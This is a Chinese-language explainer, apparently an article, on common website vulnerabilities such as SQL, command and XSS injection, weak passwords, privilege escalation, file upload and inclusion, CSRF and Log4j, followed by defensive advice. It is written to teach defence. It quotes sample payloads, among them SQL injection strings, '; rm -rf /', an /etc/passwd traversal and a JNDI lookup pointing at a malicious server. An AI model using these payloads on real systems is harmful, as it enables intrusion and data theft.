网站常见的安全漏洞有哪些?

网站常见的安全漏洞是攻击者入侵的主要途径，了解这些漏洞的原理和表现，才能针对性防御。以下是最频发、危害最大的几类漏洞，附原理和典型场景：

一、注入攻击(最常见，占漏洞总量 30%+)

1. SQL 注入

原理：攻击者在用户输入(如表单、URL 参数)中插入恶意 SQL 语句，欺骗服务器执行，窃取 / 篡改数据库数据，甚至控制服务器。

典型场景：

登录页：输入用户名 ' OR 1=1 --，密码任意，可能直接登录(利用 SQL 逻辑漏洞)。

搜索框：输入 %' UNION SELECT username,password FROM users --，可能泄露用户账号密码。

危害：数据库被拖库(窃取全部数据)、删库、篡改订单 / 金额等。

2. XSS(跨站脚本攻击)

原理：攻击者注入恶意 JavaScript 代码到网页中，当其他用户访问时，代码在其浏览器执行，窃取 Cookie、伪造操作、跳转到页面等。

分类：

存储型 XSS：恶意代码被存入服务器(如评论区、用户资料)，所有访问者都会触发(危害最大)。

反射型 XSS：恶意代码通过 URL 参数传递，仅当用户点击含恶意参数的链接时触发。

典型场景：

在评论区输入 ，若未过滤，所有看到该评论的用户会弹出 Cookie。

攻击者生成含 XSS 的链接(如 http://xxx.com/search?key=)，诱导用户点击。

3. 命令注入

原理：网站若调用系统命令(如exec()、system())处理用户输入，攻击者可注入恶意命令(如; rm -rf /)，直接控制服务器。

典型场景：

某网站有 “ping 检测” 功能，用户输入 IP 后，后端执行 ping $user_input，若输入 8.8.8.8; ls /，则会同时执行ls命令泄露文件。

二、身份认证与权限漏洞

1. 弱口令 / 默认口令

原理：用户使用简单密码(如123456、password)或管理员未修改默认账号密码(如admin/admin)，攻击者通过暴力破解(枚举密码)登录。

典型场景：

后台登录页被扫：攻击者用工具尝试admin+123456、root+123456等常见组合，成功登录后篡改网站。

2. 会话管理漏洞

原理：Session/Cookie 设计不当，导致攻击者可伪造或窃取会话凭证，冒充合法用户。

典型场景：

Session 固定：登录后 Session ID 不变，攻击者诱导用户用固定 ID 登录，再用该 ID 冒充用户。

Cookie 未设HttpOnly：XSS 漏洞配合document.cookie可直接读取 Cookie，获取登录凭证。

3. 越权访问

原理：权限校验逻辑缺陷，允许低权限用户访问 / 操作高权限资源。

分类：

水平越权：同权限用户间互访数据(如用户 A 能查看用户 B 的订单，通过修改 URL 中的user_id实现)。

垂直越权：低权限用户访问管理员功能(如普通用户通过访问/admin/xxx直接进入后台)。

三、文件处理漏洞

1. 文件上传漏洞

原理：网站未严格限制上传文件的类型 / 内容，攻击者上传恶意脚本(如.php、.asp文件)，通过访问该文件执行代码，控制服务器。

典型场景：

头像上传功能：本应只允许图片，攻击者将webshell.php改名为webshell.jpg上传，再通过路径解析漏洞(如服务器误将.jpg当 PHP 执行)触发。

2. 文件包含漏洞

原理：网站使用动态文件包含函数(如 PHP 的include()、require())时，若参数可控，攻击者可指定包含恶意文件(本地或远程)，执行代码。

典型场景：

页面通过?page=home加载不同模块，后端执行include($_GET['page'].php)，攻击者传入?page=../../../../etc/passwd，可读取系统文件。

四、其他高危漏洞

1. CSRF(跨站请求伪造)

原理：攻击者诱导已登录用户访问恶意网站，利用用户的登录状态，以用户名义执行操作(如转账、改密码)。

典型场景：

某银行网站转账接口为/transfer?to=xxx&money=100.攻击者在自己的网站放一个图片标签 ，用户登录银行后访问该网站，会自动触发转账。

2. 敏感信息泄露

原理：网站未对敏感数据加密或保护，导致信息被窃取。

典型场景：

密码明文存储：数据库中用户密码以明文或弱哈希(如 MD5)存储，被拖库后直接泄露。

错误信息暴露：服务器报错时显示详细堆栈(如数据库地址、账号)，给攻击者提供线索。

传输未加密：HTTP 协议传输密码、身份证等，被中间人窃听。

3. 框架 / 组件漏洞

原理：使用存在已知漏洞的框架、插件或库(如 Log4j、Struts2、WordPress 插件)，攻击者利用公开漏洞直接入侵。

典型场景：

2021 年 Log4j 漏洞：攻击者通过输入${jndi:ldap://恶意服务器}，可远程执行代码，影响大量 Java 应用。

WordPress 某插件漏洞：被利用植入后门，导致网站被挂黑链。

总结：漏洞本质与防御核心

所有漏洞的本质都是 **“用户输入未被严格校验” 或 “逻辑设计存在缺陷”**。防御核心是：

对所有用户输入(表单、URL、Cookie)进行严格过滤和验证;

遵循 “最小权限原则”(账号、数据库、服务器);

及时更新框架 / 组件，修补已知漏洞;

用 WAF(Web 应用防火墙)拦截常见攻击特征。